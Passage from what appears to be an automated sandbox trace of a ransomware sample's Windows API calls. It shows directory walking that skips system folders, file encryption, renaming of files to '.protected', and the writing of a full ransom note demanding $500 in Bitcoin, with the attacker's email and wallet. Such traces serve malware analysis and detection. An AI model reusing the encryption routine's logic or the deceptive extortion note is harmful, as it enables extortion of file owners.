(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.093] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.093] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0077.093] CloseHandle (hObject=0xa4) returned 1 [0077.093] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Windows") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Program Files") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="System Volume Information") returned -1 [0077.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0077.093] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2=".") returned 1 [0077.093] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="..") returned 1 [0077.093] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned 84 [0077.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0077.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\.") returned 84 [0077.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.094] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\..") returned 85 [0077.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.094] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0077.094] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0077.094] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned 93 [0077.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0077.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\.") returned 93 [0077.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.095] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.095] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\..") returned 94 [0077.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.096] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0077.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0077.096] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0077.096] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0077.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned 117 [0077.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0077.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.096] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\.") returned 117 [0077.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\..") returned 118 [0077.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0077.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0077.097] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0077.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0077.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0077.097] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0077.098] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.254] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.254] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.282] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.283] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0077.292] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0077.292] CloseHandle (hObject=0xd8) returned 1 [0077.293] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 134 [0077.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0077.293] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.293] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0077.294] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0077.294] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0077.294] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0077.294] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0077.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0077.294] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.326] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.326] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.334] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.334] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0077.335] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0077.335] CloseHandle (hObject=0xd8) returned 1 [0077.335] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 154 [0077.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0077.336] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0077.336] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0077.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 133 [0077.336] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0077.352] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.352] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0077.353] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.353] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0077.353] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.353] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0077.353] CloseHandle (hObject=0xd4) returned 1 [0077.354] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0077.355] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0077.355] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0077.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\restore_files.txt"), 